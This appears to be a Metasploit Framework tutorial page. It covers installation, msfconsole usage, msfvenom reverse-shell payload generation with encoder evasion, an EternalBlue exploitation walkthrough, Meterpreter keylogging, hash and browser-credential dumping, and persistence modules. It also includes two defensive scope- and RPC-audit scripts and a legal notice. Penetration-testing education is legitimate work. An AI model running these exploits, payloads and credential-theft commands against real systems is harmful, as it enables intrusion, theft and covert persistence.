# Metasploit Framework

> **The World's Most Used Penetration Testing Framework**

## 📋 Overview

Metasploit Framework is a powerful open-source platform for penetration testing, vulnerability assessment, and security research. Developed by Rapid7, Metasploit provides tools to identify, exploit, and validate vulnerabilities.

## 🎯 Key Features

### 🎯 **Exploitation Engine**

* **1,800+ Exploits** - Wide range of exploit modules
* **Payload Generation** - Custom payload creation
* **Encoder Integration** - Evasion techniques
* **Post-Exploitation** - System manipulation after access
* **Evasion Modules** - Anti-virus and firewall bypass

### 🔍 **Scanning and Discovery**

* **Auxiliary Modules** - Scanning, fuzzing, and discovery tools
* **Reconnaissance** - Information gathering modules
* **Vulnerability Scanning** - Automated vulnerability detection
* **Network Mapping** - Comprehensive network discovery
* **Port Scanning** - Integrated scanning capabilities

### 🛡️ **Testing Modules**

* **Brute Force** - Password and credential attacks
* **Fuzzing** - Application vulnerability discovery
* **Spoofing** - Network manipulation tools
* **Sniffing** - Network traffic analysis
* **Social Engineering** - Human-targeted attacks

### 📊 **Management Interface**

* **msfconsole** - Command-line interface
* **msfvenom** - Payload generator
* **msfdb** - Database management
* **msgrpc** - Remote API interface
* **msfweb** - Web interface (Pro version)

## 🚀 Installation

### Kali Linux (Pre-installed)

```bash
# Metasploit comes pre-installed on Kali Linux
# Update framework (msfupdate is not supported on Kali packages; use apt)
sudo apt update && sudo apt install metasploit-framework

# Check version
msfconsole --version
```

### Ubuntu/Debian Installation

```bash
# Option 1: Rapid7 installer script (adds the package repository and installs the framework)
# Review the downloaded script before running it
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Option 2: Install from source
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
# From a source checkout, run msfdb as a regular user, not root
./msfdb init
```

### Docker Installation

```bash
# Pull Metasploit image
docker pull metasploitframework/metasploit-framework

# Run container
docker run -it -p 4444:4444 metasploitframework/metasploit-framework

# With persistent storage
docker run -it -v /tmp/msf:/root/.msf4 metasploitframework/metasploit-framework
```

### Windows Installation

```powershell
# Install Ruby (RubyInstaller+Devkit)
# Install Git for Windows
# Install PostgreSQL (optional)
# Clone repository
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
ruby msfconsole
```

## 🔧 Basic Configuration

### Database Setup

```bash
# Initialize PostgreSQL database
sudo msfdb init

# Start database
sudo systemctl start postgresql

# Connect msfconsole with database
msfconsole
```

### First-Time Setup

```bash
# Launch Metasploit
msfconsole

# Check database connection
# (the module cache is maintained automatically since Metasploit 5,
#  so db_rebuild_cache is no longer needed)
msf> db_status

# Configure workspace
msf> workspace -a my_project
msf> workspace my_project
```

## 🔍 Basic Usage

### msfconsole Interface

```bash
# Launch console
msfconsole

# Basic commands
msf> help                    # Show help
msf> search exploit          # Search exploits
msf> info exploit_name       # Show exploit details
msf> use exploit_name        # Select exploit
msf> show options           # Show exploit options
msf> set RHOSTS 192.168.1.100 # Set target
msf> exploit                 # Run exploit
```

### Searching Modules

```bash
# Search by type
msf> search type:exploit
msf> search type:auxiliary
msf> search type:post

# Search by platform
msf> search platform:windows
msf> search platform:linux

# Search by name
msf> search eternalblue
msf> search smb
msf> search web

# Search with multiple criteria
msf> search eternalblue platform:windows type:exploit
```

### Using Exploits

```bash
# Select exploit
msf> use exploit/windows/smb/ms17_010_eternalblue

# Show exploit information
msf> info

# Show required options
msf> show options

# Set target options
msf> set RHOSTS 192.168.1.100
msf> set SMBDomain WORKGROUP
msf> set SMBUser user
msf> set SMBPass password

# Show available targets
msf> show targets

# Set target
msf> set TARGET 0

# Generate and run exploit
msf> exploit
```

## 🎯 Common Use Cases

### 1. **Basic Exploitation**

```bash
# EternalBlue exploit
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.100
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> exploit
```

### 2. **Web Application Testing**

```bash
# WordPress login enumeration
msf> use auxiliary/scanner/http/wordpress_login_enum
msf> set RHOSTS blog.example.com
msf> set USER_FILE /usr/share/wordlists/usernames.txt
msf> set PASS_FILE /usr/share/wordlists/passwords.txt
msf> run

# Directory brute force (DICTIONARY is the wordlist; PATH is the base URL path to scan)
msf> use auxiliary/scanner/http/dir_scanner
msf> set RHOSTS www.example.com
msf> set DICTIONARY /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
msf> run
```

### 3. **Network Reconnaissance**

```bash
# Port scanning
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 1-1000
msf> set THREADS 50
msf> run

# SMB enumeration
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set RHOSTS 192.168.1.100
msf> set SMBUser guest
msf> run
```

### 4. **Post-Exploitation**

```bash
# After getting a Meterpreter session
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ps
meterpreter> hashdump
meterpreter> screenshot
meterpreter> keyscan_start
meterpreter> upload exploit.exe
meterpreter> execute -f exploit.exe
meterpreter> background
```

## 🔧 Payload Generation with msfvenom

### Basic Payload Creation

```bash
# Generate Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe > payload.exe

# Generate Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf > payload.elf

# Generate Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f apk > payload.apk
```

### Encoded Payloads

```bash
# Generate encoded payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe

# Multiple encoding iterations
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe > multi_encoded.exe
```

### Payload Formats

```bash
# Different output formats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c > shellcode.c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python > shellcode.py
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shellcode.bin
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll > payload.dll
```

## 📊 Database Operations

### Workspace Management

```bash
# Create workspace
msf> workspace -a pentest_project
msf> workspace pentest_project

# List workspaces
msf> workspace

# Delete workspace
msf> workspace -d pentest_project
```

### Importing Data

```bash
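# Run Nmap from msfconsole (results are stored in the database automatically;
# -oX also keeps an XML copy on disk)
msf> db_nmap -sS -A -oX scan.xml 192.168.1.0/24

# Import an existing Nmap XML file
msf> db_import scan.xml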

# Import Nessus results
msf> db_import nessus_report.xml

# Import masscan results
msf> db_import masscan_output.xml
```

### Reporting

```bash
# List hosts in database
msf> hosts

# List services
msf> services

# List vulnerabilities
msf> vulns

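# Export workspace data (the framework console has no report command;
# db_export writes the database contents as XML)
msf> db_export -f xml /tmp/report.xml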
```

## 🔗 Meterpreter Sessions

### Session Management

```bash
# List active sessions
msf> sessions

# Interact with session
msf> sessions -i 1

# Background session
meterpreter> background

# Kill session
msf> sessions -k 1
```

### Common Meterpreter Commands

```bash
# System information
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getpid

# File system
meterpreter> pwd
meterpreter> ls
meterpreter> download file.txt
meterpreter> upload payload.exe
meterpreter> rm file.txt

# Network
meterpreter> ipconfig
meterpreter> route
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.1.100

# Process management
meterpreter> ps
meterpreter> kill 1234
meterpreter> migrate 5678

# Screenshot and keylogging
meterpreter> screenshot
meterpreter> keyscan_start
meterpreter> keyscan_dump

# Persistence
meterpreter> run persistence -S -U -X -i 10 -p 4444 -r 192.168.1.50
```

## 🔧 Advanced Features

### Resource Scripts

```bash
# Create resource script (script.rc)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit

# Run resource script
msfconsole -r script.rc
```
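Because a resource script runs unattended, its targets are worth checking against the authorized scope before `msfconsole -r` is invoked. The following is an added example, not part of the original page or of Metasploit: the function names, the scope list and the sample script are constructed for illustration, and anything that is not a literal address, CIDR block or full `first-last` range is reported rather than resolved.

```python
import ipaddress
import re

# Constructed engagement scope and resource script (not from the page).
AUTHORIZED_SCOPE = ["192.168.1.0/24"]
SAMPLE_RC = """\
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100 192.168.2.0/24
set PORTS 1-1000
run
use auxiliary/scanner/smb/smb_enumshares
setg RHOSTS 192.168.1.10-192.168.1.20
run
set RHOSTS blog.example.com
"""

# Matches "set RHOSTS ..." / "setg RHOST ..." (msfconsole option names ignore case).
SET_RE = re.compile(r"^\s*setg?\s+RHOSTS?\s+(.+?)\s*$", re.IGNORECASE)

def expand(token):
    """Return the networks covered by one RHOSTS token, or None when the token
    is not a literal address, CIDR block or full first-last range."""
    try:
        if "-" in token:
            first, last = (ipaddress.ip_address(p) for p in token.split("-", 1))
            return list(ipaddress.summarize_address_range(first, last))
        return [ipaddress.ip_network(token, strict=False)]
    except (ValueError, TypeError):
        return None

def out_of_scope(rc_text, scope):
    """List (line_no, token, reason) for every target not provably in scope."""
    allowed = [ipaddress.ip_network(s) for s in scope]
    findings = []
    for no, line in enumerate(rc_text.splitlines(), 1):
        m = SET_RE.match(line)
        for token in re.split(r"[,\s]+", m.group(1)) if m else []:
            nets = expand(token)
            if nets is None:
                findings.append((no, token, "hostname or unsupported syntax"))
            elif not all(any(n.version == a.version and n.subnet_of(a)
                             for a in allowed) for n in nets):
                findings.append((no, token, "outside authorized scope"))
    return findings

if __name__ == "__main__":
    for finding in out_of_scope(SAMPLE_RC, AUTHORIZED_SCOPE):
        print("line %d: %s (%s)" % finding)
```

An empty result means every `RHOSTS` value in the script is a literal address inside the scope list; hostnames are flagged so they can be resolved and confirmed by hand.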

### Plugin System

```bash
# List plugins
msf> load

# Load plugins
msf> load nessus
msf> load openvas
msf> load pcap_log
```

### API Integration

```bash
# Start RPC service (msgrpc is a console plugin, so it is started with load)
msf> load msgrpc ServerHost=192.168.1.50 ServerPort=55553 User=msf Pass=password
```

```python
# Connect via Python
import msfrpc
client = msfrpc.Msfrpc({'host': '192.168.1.50', 'port': 55553})
client.login('msf', 'password')
```
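Anyone who can reach the RPC listener and guess its password controls the framework and every open session, so the listener options deserve a check before the service is started. The following is an added example, not part of the original page or of Metasploit: it audits a `load msgrpc` command line, assuming the plugin defaults of a loopback listener, SSL off and a random password when `Pass` is omitted; the function names, the guessable-password list, the length policy and the hardened sample line are constructed for illustration.

```python
import ipaddress

# Constructed examples: the first uses the option values shown above, the
# second is a locked-down variant with a made-up user and password.
PAGE_LINE = "load msgrpc ServerHost=192.168.1.50 ServerPort=55553 User=msf Pass=password"
HARDENED_LINE = "load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=rpc-op Pass=Vt7qLx2mRz9KdPw4HsB8"

GUESSABLE = {"password", "msf", "metasploit", "admin", "changeme"}  # example list
MIN_LENGTH = 16  # this example's policy, not a Metasploit requirement

def parse_msgrpc(line):
    """Return the Key=Value options of a 'load msgrpc' line, or None."""
    words = line.split()
    if words and words[0].startswith("msf") and words[0].endswith(">"):
        words = words[1:]  # drop a console prompt copied along with the command
    if words[:2] != ["load", "msgrpc"]:
        return None
    return {k: v for k, _, v in (w.partition("=") for w in words[2:])}

def audit_msgrpc(line):
    """List the exposure problems in one 'load msgrpc' command line."""
    opts = parse_msgrpc(line)
    if opts is None:
        return []
    issues = []
    # Assumed plugin defaults: loopback listener, SSL off, random password.
    host = opts.get("ServerHost", "127.0.0.1")
    try:
        local_only = ipaddress.ip_address(host).is_loopback
    except ValueError:
        local_only = host == "localhost"
    if not local_only:
        issues.append("RPC listener reachable on " + host)
        if not opts.get("SSL", "false").lower().startswith(("t", "y")):
            issues.append("no TLS: password and auth token sent in clear text")
    password = opts.get("Pass")
    if password is not None:
        if password.lower() in GUESSABLE or password == opts.get("User", "msf"):
            issues.append("guessable password")
        elif len(password) < MIN_LENGTH:
            issues.append("password shorter than %d characters" % MIN_LENGTH)
    return issues

if __name__ == "__main__":
    for sample in (PAGE_LINE, HARDENED_LINE):
        print(sample, "->", audit_msgrpc(sample) or "ok")
```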

## 📈 Post-Exploitation Modules

### Privilege Escalation

```bash
# Windows privilege escalation
msf> use exploit/windows/local/bypassuac_eventvwr
msf> use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

# Linux privilege escalation
msf> use exploit/linux/local/cve_2016_5195
msf> use exploit/linux/local/glibc_realpath_priv_esc
```

### Credential Harvesting

```bash
# Hash dumping
msf> use post/windows/gather/hashdump
msf> use post/linux/gather/hashdump

# Password dumping
msf> use post/windows/gather/credentials/freerdp
msf> use post/windows/gather/credentials/vnc

# Browser password dumping
msf> use post/multi/gather/firefox_creds
msf> use post/multi/gather/chrome_creds
```

### Persistence

```bash
# Windows persistence
msf> use exploit/windows/local/persistence_service
msf> use exploit/windows/local/registry_persistence

# Linux persistence
msf> use exploit/linux/local/cron_persistence
msf> use exploit/linux/local/ld_preload_persistence
```

## 🔗 Automation and Scripting

### Bash Automation

```bash
#!/bin/bash
# Automated scanning script

TARGET="192.168.1.0/24"
LHOST="192.168.1.50"

# Initialize Metasploit database
msfdb init

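# Run Nmap scan from the shell (db_nmap exists only inside msfconsole)
nmap -sS -A -oX scan.xml "$TARGET"

# Start Metasploit with resource script
# (auto_scan.rc should start with "db_import scan.xml" to load the results)
msfconsole -r auto_scan.rc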
```

### Python Integration

```python
from pymetasploit3.msfrpc import MsfRpcClient

# Connect to Metasploit RPC
client = MsfRpcClient('password', port=55553, server='192.168.1.50')

# Select exploit and set its options
exploit = client.modules.use('exploit', 'windows/smb/ms17_010_eternalblue')
exploit['RHOSTS'] = '192.168.1.100'

# The payload is a separate module object with its own options
payload = client.modules.use('payload', 'windows/x64/meterpreter/reverse_tcp')
payload['LHOST'] = '192.168.1.50'

# Execute exploit
exploit.execute(payload=payload)
```

## 🎓 Learning Resources

### Official Documentation

* [Metasploit Official Documentation](https://docs.metasploit.com/)
* [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)
* [Rapid7 Blog](https://blog.rapid7.com/tag/metasploit/)
* [Metasploit Community](https://community.rapid7.com/)

### Practice Environments

* **Metasploitable2** - Vulnerable Linux VM for practice
* **Metasploitable3** - Modern vulnerable Windows/Linux VMs
* **Hack The Box** - Online penetration testing labs
* **TryHackMe** - Guided penetration learning paths

## 📊 Comparison with Other Frameworks

| Feature            | Metasploit | Cobalt Strike | Empire    | PTF       |
| ------------------ | ---------- | ------------- | --------- | --------- |
| **Cost**           | 🆓 Free    | 💰 Enterprise | 🆓 Free   | 🆓 Free   |
| **Exploits**       | 1,800+     | Custom        | Limited   | 1,800+    |
| **Payloads**       | Extensive  | Custom        | Custom    | Extensive |
| **C2 Features**    | Basic      | Advanced      | Advanced  | Basic     |
| **Team Support**   | Limited    | ✅             | ✅         | Limited   |
| **Learning Curve** | 📚 Medium  | 📚 Hard       | 📚 Medium | 📚 Medium |

## 🔧 Troubleshooting

### Common Issues

```bash
# Database connection issues
sudo systemctl restart postgresql
msfdb reinit

# Module not found (reload all modules from the module paths)
msf> reload_all

# Permission issues
sudo msfconsole

# Session stability
msf> set ExitOnSession false
msf> set EXITFUNC thread
```

### Debug Mode

```bash
# Start with debug output
msfconsole -d

# Enable verbose logging
msf> set GlobalLogLevel 5

# Check module loading
msf> loadpath /path/to/custom/modules
```

## 🛡️ Security and Legal Considerations

### Legal Compliance

* **Authorization**: Only test systems you own or have permission to test
* **Documentation**: Keep records of all testing activities
* **Scope**: Stay within defined testing boundaries
* **Reporting**: Document findings responsibly

### Operational Security

* **Infrastructure**: Use isolated testing environment
* **Traffic**: Consider VPN or secure connections
* **Logs**: Monitor and log all activities
* **Cleanup**: Remove all artifacts after testing

### Countermeasures

* **Detection**: Understand IDS/IPS signatures
* **Evasion**: Use appropriate encoding and techniques
* **Noise**: Minimize network impact
* **Persistence**: Avoid unnecessary persistence mechanisms

***

**⚠️ Legal Notice**: Metasploit should only be used on systems you own or have explicit permission to test. Unauthorized exploitation is illegal.

**⚡ Pro Tip**: Always verify targets are in scope before running exploits. Start with reconnaissance modules before attempting exploitation.

*📅 Last Updated: 2024*
